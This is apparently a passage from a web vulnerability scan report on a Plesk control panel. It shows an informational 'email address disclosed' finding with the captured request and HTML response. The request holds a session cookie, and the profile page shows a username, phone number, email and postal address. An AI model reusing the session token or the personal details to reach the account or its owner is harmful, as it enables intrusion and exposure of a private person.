items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"active","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading ">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
</div>
<h2><span>Mail</span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.bar.Tabs({
cls: 'tabs',
renderTo: 'main',
items: [{"componentType":"Jsw.bar.Button","title":"E-mail Addresses","href":"\/email-address\/list","containerCls":"active"},{"componentType":"Jsw.bar.Button","title":"Mailing Lists","href":"\/mail-list\/list","containerCls":""}] });
});
//]]>
</script>
<script type="text/javascript">
//<![CDATA[

Jsw.namespace('Smb.Views.Emails');

Smb.Views.Emails = {

_configuationDialog: null,
selectedEmailId: null,

showConfiguration: function(emailId) {
this.selectedEmailId = emailId;

if (this._configuationDialog) {
this._configuationDialog.show();
return;
}

this._configuationDialog = new Jsw.Popup({
title: 'Configure E-mail Client',
titleCls: 'pp-configure-email-client',
content: '<p>' + 'If you use Microsoft Outlook, Outlook Express, Thunderbird, or Apple Mail, click the link below to open step-by-step instructions on how to set up your e-mail account in these clients. To configure other e-mail clients, use the account settings shown under the Manual Setup.' + '</p>' +
'<p><a href="' + Jsw.baseUrl + '/help/redirect/controller-name/email-address/action-name/configuration" target="_blank">' +
'View instructions on configuring MS Outlook, Outlook Express, Apple Mail, and Thunderbird.' +
'</a></p>' +
'<div class="form-box">' +
'<div class="box-area">' +
'<div class="title">' +
'<div class="title-area">' +
'<h3><span>' +
'Manual Setup' +
'</span></h3>' +
'</div>' +
'</div>' +
'<div class="content">' +
'<div class="content-area" id="mailSettingsContent">' +
'</div>' +
'</div>' +
'</div>' +
'</div>',
buttons: [{
title: 'Close',
handler: function(event, popup) {
popup.hide();
}
}],
onShow: function() {
var dialog = Smb.Views.Emails._configuationDialog;
new Ajax.Request(Jsw.prepareUrl('/email-address/configuration/id/' + Smb.Views.Emails.selectedEmailId), {
method: 'get',
onCreate: function() {
$('mailSettingsContent').update(
'<div class="ajax-loading">' +
'Loading...' +
'</div>'
);
},
onSuccess: function(transport) {
$('mailSettingsContent').update(transport.responseText);
},
on500: function(){
dialog.hide();
}
});
}
});
}

}

//]]>
</script>
<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Hint({
renderTo: 'main',
hint: 'Create and manage e-mail accounts associated with your domains. For each e-mail account, you can set up a mailbox, a number of additional e-mail addresses that will point to the same mailbox (e-mail aliases), an auto-reply, and mail forwarding to one or several e-mail addresses. You can also set up protection from spam and viruses, if these services are available for your account.' });

new Jsw.List({
id: 'email-addresses-list',
renderTo: 'main',
data: {"pager":{"pageCount":0,"itemCountPerPage":25,"first":1,"current":1,"last":0,"pagesInRange":{"1":1},"firstPageInRange":1,"lastPageInRange":1,"currentItemCount":0,"totalItemCount":0,"firstItemNumber":1,"lastItemNumber":0},"state":{"sortField":"name","sortDirection":"up","currentPage":1,"itemsPerPage":25,"searchFilters":{"name":{"searchText":""}},"forceShowSearch":false},"data":[],"locale":{"recordsTotal":"%%total%% items total","pages":"Pages","firstPage":"First","lastPage":"Last","numberOfItemPerPage":"Number of entries per page","hideSearch":"Hide Search","showSearch":"Show Search","buttonSearch":"Search","buttonResetSearch":"Reset Search","noEntriesFound":"No items found.","itemsNotSelected":"Select items first.","messageBoxButtonYes":"Yes","messageBoxButtonNo":"No","messageBoxButtonOk":"OK","allItems":"All"}},
dataUrl: '/email-address/list-data',
disabledSelectHint: '[[disabledSelectHint]]',
searchFilters: {"name":{"type":"text","fields":[],"options":null,"title":"E-mail address","overal":false}},
columns: [
Jsw.list.COLUMN_SELECTION,
{
header: 'E-mail address',
sortable: true,
dataIndex: 'name',
renderer: function(item) {
var aliases = '';
if (0 < item.aliases.length) {
aliases = ' <span class="minor">(' + item.aliases.join('; ') + ')</span>';
}
return '<a href="' + Jsw.baseUrl + '/email-address/edit/id/' + item.id + '">'
+ item.name.escapeHTML() + '@' + item.domainName.escapeHTML() + '</a>' + aliases;
}
}, {
header: '',
cls: 'minor',
renderer: function(item) {
var ret = [];
if (0 < item.redirects.length) {
var message = 1 == item.redirects.length
? '%%firstAddress%%' : '%%firstAddress%% (and %%countLeft%% more)';
ret.push(
'<div class="b-indent"><nobr>'
+ '<img class="b-indent-icon" src="' + Jsw.skinUrl + '/img/icons/small/mail-redirect-on_16.gif" alt="*"> '
+ message
.replace('%%firstAddress%%', item.redirects[0].escapeHTML())
.replace('%%count%%', item.redirects.length)
.replace('%%countLeft%%', item.redirects.length - 1)
+ '</nobr></div>'
    );
}
if (item.autoresponderEnabled) {
ret.push(
'<div class="b-indent"><nobr>'
+ '<img class="b-indent-icon" src="' + Jsw.skinUrl + '/img/icons/small/mail-autoresponder-on_16.gif" alt="*"> '
+ 'Auto-reply is switched on.' + '</nobr></div>'
);
}
return ret.join('');
}
}, {
header: 'User',
sortable: true,
cls: 'minor',
dataIndex: 'userContactName',
renderer: function(item) {
return item.userId
? '<a href="' +
Jsw.baseUrl +
'/user/' + 'edit' +
'/id/' + item.userId +
'">' + item.userContactName.escapeHTML() + '</a>'
: '';
}
}, {
header: '',
cls: 'action-icon-set t-r',
renderer: function(item) {
var content =
'<span>' +
'<span class="tooltipData">' +
'Learn how to set up your e-mail account in a mail client program, such as Microsoft Outlook, Outlook Express, Thunderbird, and Apple Mail.' +
'</span>' +
'<a href="#" onclick="Smb.Views.Emails.showConfiguration(' + item.id + ');">' +
'<img src="' + Jsw.skinUrl + '/img/icons/small/edit-email_16.gif"/>' +
'</a>' +
'</span> ';

if (item.webmailUrl) {
var onclick = Smb.Webmail.urlWrapper(item.webmailUrl) + 'return false;';
content +=
'<span>' +
'<span class="tooltipData">' +
'Open webmail for this e-mail address in a new browser window.' +
'</span>' +
'<a href="#" onclick=\'' + onclick + '\'>' +
'<img src="' + Jsw.skinUrl + '/img/icons/small/webmail-on_16.png"/>' +
'</a>' +
'</span> ';
} else {
   content += '<img src="' + Jsw.skinUrl + '/img/icons/small/spacer_16.gif"/> ';
}

return content;
}
}
],
operations: [
{
componentType: 'Jsw.SmallButton',
title: 'Create E-mail Address',
description: 'Create a new e-mail address in the system and assign it to a user. To create a business e-mail address not associated with any particular user (like sales@mycompany.com), go to the Mailing Lists tab, and create a mailing list.',
addCls: 'sb-add-mail-account',
href: '/email-address/create'
}, {
componentType: 'Jsw.bar.Separator'
}, {
componentType: 'Jsw.SmallButton',
title: 'Change Settings',
description: 'Switch mail service for the domain on or off, specify how to deal with mail sent to nonexistent users, and select webmail program.',
addCls: 'sb-change-mail-settings',
href: '/email-address/mail-settings'
}, {
componentType: 'Jsw.bar.Separator'
}, {
componentType: 'Jsw.SmallButton',
title: 'Remove',
description: 'Remove selected e-mail addresses.',
addCls: 'sb-remove-selected',
handler: function() {
Jsw.getComponent('email-addresses-list').execGroupOperation({
url: '/email-address/delete/?redirect=/email-address/list/',
subtype: 'delete',
locale: {
confirmOnGroupOperation: 'Remove the selected e-mail addresses?' }
});
}
}
]
});
});
//]]>
</script>

</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

11.6. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/my-profile

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /smb/my-profile

Issue detail

The following email address was disclosed in the response:

Request

GET /smb/my-profile HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PLESKSESSID=17161f28b87a6960fb097d11330c9c53; no_frames_root_page=deleted; locale=en-US; no_frames_logout_page=deleted; no_frames=deleted; no_frames_login_page=deleted;

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 18:22:32 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 18:22:32 GMT
Connection: close
Content-Length: 41318

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="3e86204e9517123c7f585d736d64aa3f" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<title>My Profile - Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/my-profile/action-name/index" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fmy-profile' + '&activeModule=' + '' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading no-border">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
</div>
<h2><span>My Profile</span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<form id="form-user" enctype="application/x-www-form-urlencoded" action="" method="post"><div id='form-tab-buttons' class='tabs'></div><script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.bar.Tabs({
type: 'dynamic',
applyTo: 'form-tab-buttons',
items: [{"componentType":"Jsw.bar.Button","title":"General","tabId":"tab-general","containerCls":"active"},{"componentType":"Jsw.bar.Button","title":"Contact Details","tabId":"tab-contacts","containerCls":""}]
});
});
</script>

<div id='tab-general' >

<div id='general-vcard' class='form-box' >
<div id='general-vcard-content-area'>

<div class='form-row'>
<div class='field-name'><label for='general-vcard-contactName'>Contact name&nbsp;</label></div>
<div class='field-value'>
<div class='text-value'>
<span id='general-vcard-contactName'>Hoyt LLC Research</span>

</div>
</div>
</div>
<div class="form-row">
<div class='field-name'>
<label for='general-vcard-email-emailType'>E-mail address&nbsp;</label> <span class="required">*</span>
</div>
<div class="field-value">
<div class="text-value">
<div class="indent-box">

<span><input type="radio" class="radio"
value="internal"
id="general-vcard-email-emailType-internal"
name="general[vcard][email][emailType]"
/></span>

<div class="indent-box-content">
<label for="general-vcard-email-emailType-internal">Create an e-mail address under your account</label>
<div class='form-row'>
<div>
<input type="text" name="general[vcard][email][internalEmail]" id="general-vcard-email-internalEmail" value="h02332" class="input-text" /> @<span id='general-vcard-email-internalEmail-domain'>vulnerable.host.fqdn</span></div>
<span class='field-errors'>
</span>
</div>
</div>

</div>
<div class="indent-box">

<span><input type="radio" class="radio"
value="external"
id="general-vcard-email-emailType-external"
name="general[vcard][email][emailType]"
checked="checked" /></span>

<div class="indent-box-content">
<label for="general-vcard-email-emailType-external">Use an external e-mail address</label>
<div class='form-row'>
<div>
<input type="text" name="general[vcard][email][externalEmail]" id="general-vcard-email-externalEmail" value="h02332@gmail.com" class="f-middle-size input-text" disabled="1" /></div>
<span class='field-errors'>
</span>
</div>
</div>

</div>
</div>
</div>
</div>

<script type="text/javascript">
//<![CDATA[
Smb.UserEmailForm = Class.create({

initialize: function(config) {
this._prefix = config['prefix'];
this._internalEmailId = this._prefix + config['internalEmailId'];
this._internalEmailElements = config['internalEmailElements'];
this._externalEmailId = this._prefix + config['externalEmailId'];
this._externalEmailElements = config['externalEmailElements'];
$(this._internalEmailId).observe('click', this._internalEmailOnClick.bind(this));
$(this._externalEmailId).observe('click', this._externalEmailOnClick.bind(this));
if ($(this._internalEmailId).checked) {
this._internalEmailOnClick();
} else {
   this._externalEmailOnClick();
}
},

_internalEmailOnClick: function() {
this._externalEmailElements.each(function(elementId) {
$(this._prefix + elementId).disable();
}, this);
this._internalEmailElements.each(function(elementId) {
$(this._prefix + elementId).enable();
}, this);
},

_externalEmailOnClick: function() {
this._internalEmailElements.each(function(elementId) {
$(this._prefix + elementId).disable();
}, this);
this._externalEmailElements.each(function(elementId) {
$(this._prefix + elementId).enable();
}, this);
}
});

Jsw.onReady(function() {
new Smb.UserEmailForm({
prefix: 'general-vcard-email-',
internalEmailId: 'emailType-internal',
internalEmailElements: ['internalEmail'
],
externalEmailId: 'emailType-external',
externalEmailElements: ['externalEmail']
});

});
//]]>
</script>

</div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: 'General Information',
applyTo: 'general-vcard'
});
});
//]]>
</script>


<div id='general-account' class='form-box' >
<div id='general-account-content-area'>

<div class='form-row'>
<div class='field-name'><label for='general-account-login'>Username&nbsp;</label></div>
<div class='field-value'>
<div class='text-value'>
<span id='general-account-login'>xsscx</span>

</div>
</div>
</div>
<div id='general-account-password-form-row' class='form-row' >
<div class='field-name'><label for='general-account-password'>Password&nbsp;</label></div>
<div class='field-value'>

<input type="password" name="general[account][password]" id="general-account-password" value="" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div><script type='text/javascript'>
Jsw.onReady(function() {
var pswd = $('general-account-password');
new Jsw.PasswordMeter({
renderTo: 'general-account-password',
renderMode: 'after',
observe: 'general-account-password',
locale: {"title":"Password Strength","description":"To improve your password: ","passwordTooShort":"Make the password longer.","lettersLowerCase":"Use at least one lower-case character.","lettersUpperCase":"Use at least one upper-case character.","numbers1":"Use at least one number.","numbers3":"Use at least three numbers.","specialChar1":"Use at least one special character (for example: !, @, #, $, % ,^, &, *, ?, _, ~).","specialChar2":"Use at least two special characters (for example: !, @, #, $, %, ^, &, *, ?, _, ~).","comboUpperAndLower":"Use both upper and lower-case characters.","comboLettersAndNumbers":"Use both numbers and characters.","comboLettersNumbersSpecial":"Use numbers, characters and special characters.","yourPasswordIsStrong":"Your password is strong, but you can make it even stronger by increasing its length.","verdictNone":"Very weak","verdictVeryWeak":"Very weak","verdictWeak":"Weak","verdictMediocre":"Medium","verdictStrong":"Strong","verdictStronger":"Very strong"}
}).render();
});</script>
<div id='general-account-passwordConfirmation-form-row' class='form-row' >
<div class='field-name'><label for='general-account-passwordConfirmation'>Confirm password&nbsp;</label></div>
<div class='field-value'>

<input type="password" name="general[account][passwordConfirmation]" id="general-account-passwordConfirmation" value="" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='general-account-language-form-row' class='form-row' >
<div class='field-name'><label for='general-account-language'>Panel language&nbsp;</label></div>
<div class='field-value'>

<select name="general[account][language]" id="general-account-language">
<option value="en-US" label="ENGLISH (United States)" selected="selected">ENGLISH (United States)</option>
</select>
<span class='field-errors' style="display:none;"></span>

</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: 'Panel Preferences',
applyTo: 'general-account'
});
});
//]]>
</script>
</div>
<div id='tab-contacts' style="display: none;">

<div id='contacts-contactsSection' class='form-box' >
<div id='contacts-contactsSection-content-area'>
<div id='contacts-contactsSection-companyName-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-companyName'>Company name&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][companyName]" id="contacts-contactsSection-companyName" value="Hoyt LLC Research" class="f-middle-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-phone-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-phone'>Phone number&nbsp;<span class="required">*</span></label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][phone]" id="contacts-contactsSection-phone" value="+1 339 206 1886" class="f-middle-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-fax-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-fax'>Fax number&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][fax]" id="contacts-contactsSection-fax" value="" class="f-middle-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-address-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-address'>Address&nbsp;</label></div>
<div class='field-value'>

<textarea name="contacts[contactsSection][address]" id="contacts-contactsSection-address" class="f-middle-size" rows="4" cols="80">PO BOX 250
</textarea>
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-city-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-city'>City&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][city]" id="contacts-contactsSection-city" value="Accord" class="f-middle-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-state-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-state'>State or province&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][state]" id="contacts-contactsSection-state" value="MA" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-zip-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-zip'>Postal or ZIP code&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][zip]" id="contacts-contactsSection-zip" value="02018" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-country-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-country'>Country&nbsp;</label></div>
<div class='field-value'>

<select name="contacts[contactsSection][country]" id="contacts-contactsSection-country">
<option value="AF" label="Afghanistan">Afghanistan</option>
<option value="AX" label="Åland Islands">Åland Islands</option>
<option value="AL" label="Albania">Albania</option>
<option value="DZ" label="Algeria">Algeria</option>
<option value="AS" label="American Samoa">American Samoa</option>
<option value="AD" label="Andorra">Andorra</option>
<option value="AO" label="Angola">Angola</option>
<option value="AI" label="Anguilla">Anguilla</option>
<option value="AQ" label="Antarctica">Antarctica</option>
<option value="AG" label="Antigua and Barbuda">Antigua and Barbuda</option>
<option value="AR" label="Argentina">Argentina</option>
<option value="AM" label="Armenia">Armenia</option>
<option value="AW" label="Aruba">Aruba</option>
<option value="AU" label="Australia">Australia</option>
<option value="AT" label="Austria">Austria</option>
<option value="AZ" label="Azerbaijan">Azerbaijan</option>
<option value="BS" label="Bahamas">Bahamas</option>
<option value="BH" label="Bahrain">Bahrain</option>
<option value="BD" label="Bangladesh">Bangladesh</option>
<option value="BB" label="Barbados">Barbados</option>
<option value="BY" label="Belarus">Belarus</option>
<option value="BE" label="Belgium">Belgium</option>
<option value="BZ" label="Belize">Belize</option>
<option value="BJ" label="Benin">Benin</option>
<option value="BM" label="Bermuda">Bermuda</option>
<option value="BT" label="Bhutan">Bhutan</option>
<option value="BO" label="Bolivia, Plurinational State of">Bolivia, Plurinational State of</option>
<option value="BA" label="Bosnia and Herzegovina">Bosnia and Herzegovina</option>
<option value="BW" label="Botswana">Botswana</option>
<option value="BV" label="Bouvet Island">Bouvet Island</option>
<option value="BR" label="Brazil">Brazil</option>
<option value="IO" label="British Indian Ocean Territory">British Indian Ocean Territory</option>
<option value="BN" label="Brunei Darussalam">Brunei Darussalam</option>
<option value="BG" label="Bulgaria">Bulgaria</option>
<option value="BF" label="Burkina Faso">Burkina Faso</option>
<option value="BI" label="Burundi">Burundi</option>
<option value="KH" label="Cambodia">Cambodia</option>
<option value="CM" label="Cameroon">Cameroon</option>
<option value="CA" label="Canada">Canada</option>
<option value="CV" label="Cape Verde">Cape Verde</option>
<option value="KY" label="Cayman Islands">Cayman Islands</option>
<option value="CF" label="Central African Republic">Central African Republic</option>
<option value="TD" label="Chad">Chad</option>
<option value="CL" label="Chile">Chile</option>
<option value="CN" label="China">China</option>
<option value="CX" label="Christmas Island">Christmas Island</option>
<option value="CC" label="Cocos (Keeling) Islands">Cocos (Keeling) Islands</option>
<option value="CO" label="Colombia">Colombia</option>
<option value="KM" label="Comoros">Comoros</option>
<option value="CG" label="Congo">Congo</option>
<option value="CD" label="Congo, the Democratic Republic of the">Congo, the Democratic Republic of the</option>
<option value="CK" label="Cook Islands">Cook Islands</option>
<option value="CR" label="Costa Rica">Costa Rica</option>
<option value="CI" label="Cote D'Ivoire">Cote D'Ivoire</option>
<option value="HR" label="Croatia">Croatia</option>
<option value="CU" label="Cuba">Cuba</option>
<option value="CY" label="Cyprus">Cyprus</option>
<option value="CZ" label="Czech Republic">Czech Republic</option>
<option value="DK" label="Denmark">Denmark</option>
<option value="DJ" label="Djibouti">Djibouti</option>
<option value="DM" label="Dominica">Dominica</option>
<option value="DO" label="Dominican Republic">Dominican Republic</option>
<option value="EC" label="Ecuador">Ecuador</option>
<option value="EG" label="Egypt">Egypt</option>
<option value="SV" label="El Salvador">El Salvador</option>
<option value="GQ" label="Equatorial Guinea">Equatorial Guinea</option>
<option value="ER" label="Eritrea">Eritrea</option>
<option value="EE" label="Estonia">Estonia</option>
<option value="ET" label="Ethiopia">Ethiopia</option>
<option value="FK" label="Falkland Islands (Malvinas)">Falkland Islands (Malvinas)</option>
<option value="FO" label="Faroe Islands">Faroe Islands</option>
<option value="FJ" label="Fiji">Fiji</option>
<option value="FI" label="Finland">Finland</option>
<option value="FR" label="France">France</option>
<option value="GF" label="French Guiana">French Guiana</option>
<option value="PF" label="French Polynesia">French Polynesia</option>
<option value="TF" label="French Southern Territories">French Southern Territories</option>
<option value="GA" label="Gabon">Gabon</option>
<option value="GM" label="Gambia">Gambia</option>
<option value="GE" label="Georgia">Georgia</option>
<option value="DE" label="Germany">Germany</option>
<option value="GH" label="Ghana">Ghana</option>
<option value="GI" label="Gibraltar">Gibraltar</option>
<option value="GR" label="Greece">Greece</option>
<option value="GL" label="Greenland">Greenland</option>
<option value="GD" label="Grenada">Grenada</option>
<option value="GP" label="Guadeloupe">Guadeloupe</option>
<option value="GU" label="Guam">Guam</option>
<option value="GT" label="Guatemala">Guatemala</option>
<option value="GG" label="Guernsey">Guernsey</option>
<option value="GN" label="Guinea">Guinea</option>
<option value="GW" label="Guinea-Bissau">Guinea-Bissau</option>
<option value="GY" label="Guyana">Guyana</option>
<option value="HT" label="Haiti">Haiti</option>
<option value="HM" label="Heard Island and McDonald Islands">Heard Island and McDonald Islands</option>
<option value="VA" label="Holy See (Vatican City State)">Holy See (Vatican City State)</option>
<option value="HN" label="Honduras">Honduras</option>
<option value="HK" label="Hong Kong">Hong Kong</option>
<option value="HU" label="Hungary">Hungary</option>
<option value="IS" label="Iceland">Iceland</option>
<option value="IN" label="India">India</option>
<option value="ID" label="Indonesia">Indonesia</option>
<option value="IR" label="Iran, Islamic Republic of">Iran, Islamic Republic of</option>
<option value="IQ" label="Iraq">Iraq</option>
<option value="IE" label="Ireland">Ireland</option>
<option value="IM" label="Isle of Man">Isle of Man</option>
<option value="IL" label="Israel">Israel</option>
<option value="IT" label="Italy">Italy</option>
<option value="JM" label="Jamaica">Jamaica</option>
<option value="JP" label="Japan">Japan</option>
<option value="JE" label="Jersey">Jersey</option>
<option value="JO" label="Jordan">Jordan</option>
<option value="KZ" label="Kazakhstan">Kazakhstan</option>
<option value="KE" label="Kenya">Kenya</option>
<option value="KI" label="Kiribati">Kiribati</option>
<option value="KP" label="Korea, Democratic People's Republic of">Korea, Democratic People's Republic of</option>
<option value="KR" label="Korea, Republic of">Korea, Republic of</option>
<option value="KW" label="Kuwait">Kuwait</option>
<option value="KG" label="Kyrgyzstan">Kyrgyzstan</option>
<option value="LA" label="Lao People's Democratic Republic">Lao People's Democratic Republic</option>
<option value="LV" label="Latvia">Latvia</option>
<option value="LB" label="Lebanon">Lebanon</option>
<option value="LS" label="Lesotho">Lesotho</option>
<option value="LR" label="Liberia">Liberia</option>
<option value="LY" label="Libyan Arab Jamahiriya">Libyan Arab Jamahiriya</option>
<option value="LI" label="Liechtenstein">Liechtenstein</option>
<option value="LT" label="Lithuania">Lithuania</option>
<option value="LU" label="Luxembourg">Luxembourg</option>
<option value="MO" label="Macao">Macao</option>
<option value="MK" label="Macedonia, the Former Yugoslav Republic of">Macedonia, the Former Yugoslav Republic of</option>
<option value="MG" label="Madagascar">Madagascar</option>
<option value="MW" label="Malawi">Malawi</option>
<option value="MY" label="Malaysia">Malaysia</option>
<option value="MV" label="Maldives">Maldives</option>
<option value="ML" label="Mali">Mali</option>
<option value="MT" label="Malta">Malta</option>
<option value="MH" label="Marshall Islands">Marshall Islands</option>
<option value="MQ" label="Martinique">Martinique</option>
<option value="MR" label="Mauritania">Mauritania</option>
<option value="MU" label="Mauritius">Mauritius</option>
<option value="YT" label="Mayotte">Mayotte</option>
<option value="MX" label="Mexico">Mexico</option>
